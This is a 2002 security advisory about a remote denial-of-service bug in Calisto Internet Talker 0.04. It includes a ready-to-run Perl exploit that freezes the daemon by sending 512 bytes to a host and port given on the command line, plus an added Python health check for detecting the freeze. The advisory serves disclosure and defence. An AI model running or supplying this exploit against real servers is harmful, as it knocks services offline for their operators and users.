SFAD02-002: Calisto Internet Talker Remote DOS

2002-11-26T00:00:00
ID SECURITYVULNS:DOC:3803
Type securityvulns
Reporter Securityvulns
Modified 2002-11-26T00:00:00

Description

[=================================================================]

Title         : Calisto Internet Talker Remote DOS
Risk          : Moderate
Software      : Calisto Internet Talker Version 0.04 and prior
Platforms     : Linux/Solaris/Cygwin
Vendor URL    : http://www.arcsite.de/hp/flibble/calisto/
Discovered by : subversive <subversive@linuxmail.org>
Advisory ID   : SFAD02-002

.....:[ Overview :

Calisto is an Internet Talker that lets many people connect to the server over telnet and chat. Calisto is written in C and runs on Linux/Solaris/Cygwin platforms. It is available on SourceForge as well as at http://www.arcsite.de/hp/flibble/calisto/.

.....:[ Details :

Sending 512 bytes or more to the Calisto daemon freezes it, resulting in a denial of service. Calisto comes with an autorun shell script written for the sole purpose of automatically restarting Calisto should it crash. Unfortunately, this vulnerability does not cause Calisto to crash and segfault; the daemon freezes and stays frozen until it is manually restarted, so the autorun script never steps in.

.....:[ Vendor Status :

Vendor contacted 1st/5th/10th November 2002 but did not respond.

.....:[ Solution :

Due to the nature of this bug, it poses more of an annoyance than a major security threat. If you're concerned about the problem, simply disable Calisto until an updated version or patch has been released. Hopefully Calisto's vendors will take notice of this advisory and do something about the problem.
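
Because the autorun script only reacts to a crash, catching the freeze described under Details needs a liveness check that waits for application data: the kernel keeps completing TCP handshakes for a hung process, so a successful connect proves nothing. The Python below is an added example, not part of the original advisory or of Calisto; it assumes a healthy talker sends a login banner on connect, and the function names, timeout and threshold are illustrative.

```python
import socket

ALIVE, FROZEN, DOWN = "alive", "frozen", "down"

def probe_connected(sock, timeout=5.0):
    """Classify an already-connected socket by whether the peer speaks.

    A frozen daemon still owns its listening socket, so the handshake
    succeeds; only bytes written by the process itself prove liveness.
    """
    sock.settimeout(timeout)
    try:
        data = sock.recv(64)
    except socket.timeout:
        return FROZEN              # connected, but the process never wrote
    except OSError:
        return DOWN                # connection reset while waiting
    return ALIVE if data else DOWN  # b"" means the peer closed on us

def probe_talker(host, port, timeout=5.0):
    """Connect to the talker and wait for its login banner (assumed)."""
    try:
        sock = socket.create_connection((host, port), timeout=timeout)
    except OSError:
        return DOWN                # refused or unreachable: process is gone
    with sock:
        return probe_connected(sock, timeout)

def should_restart(history, threshold=3):
    """True when the last `threshold` probes all failed (debounces blips)."""
    recent = history[-threshold:]
    return len(recent) == threshold and all(s != ALIVE for s in recent)

if __name__ == "__main__":
    # Constructed demo: a socketpair stands in for the talker connection.
    ours, theirs = socket.socketpair()
    print("silent peer ->", probe_connected(ours, timeout=0.5))
    theirs.sendall(b"Welcome to the talker\r\n")   # constructed banner
    print("banner sent ->", probe_connected(ours, timeout=0.5))
    ours.close()
    theirs.close()
```

Run `probe_talker` from cron or a supervisor loop, record each result, and restart the daemon when `should_restart` returns true.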

.....:[ Exploit - SF-talkischeap.pl :

#!/usr/bin/perl
#
# S e c u r i t y F r e a k s
# www.securityfreaks.com
#
# Calisto Internet Talker Version 0.04 Remote Denial of Service
#
# This exploit will not cause Calisto to crash but rather cause it
# to freeze until manually restarted. This actually works out better
# because Calisto comes with an autorun script that would restart it
# should it crash anyway.
#
# [ subversive[at]linuxmail.org ] - 31/10/2002

use IO::Socket;

$data = "A";
$size = "512";
$freeze .= $data x $size;

while($_ = $ARGV[0], /^-/) {
    shift;
    last if /^--$/;
    /^-h/ && do { $host = shift; };
    /^-p/ && do { $port = shift; };
}

if(!$host != 0) {

print <<"ACTIONSSPEAKLOUDERTHANWORDS";

S e c u r i t y F r e a k s
www.securityfreaks.com

SF-talkischeap.pl by subversive
Calisto Internet Talker Version 0.04 Remote Denial of Service

Usage : $0 -h <host> -p <port>

ACTIONSSPEAKLOUDERTHANWORDS
exit;

}

my $sock = new IO::Socket::INET (
    Proto => "tcp",
    PeerAddr => $host,
    PeerPort => $port,
);
die "\nCould not connect to $host : $!\n" unless $sock;

print $sock "$freeze";
close($sock);
exit;
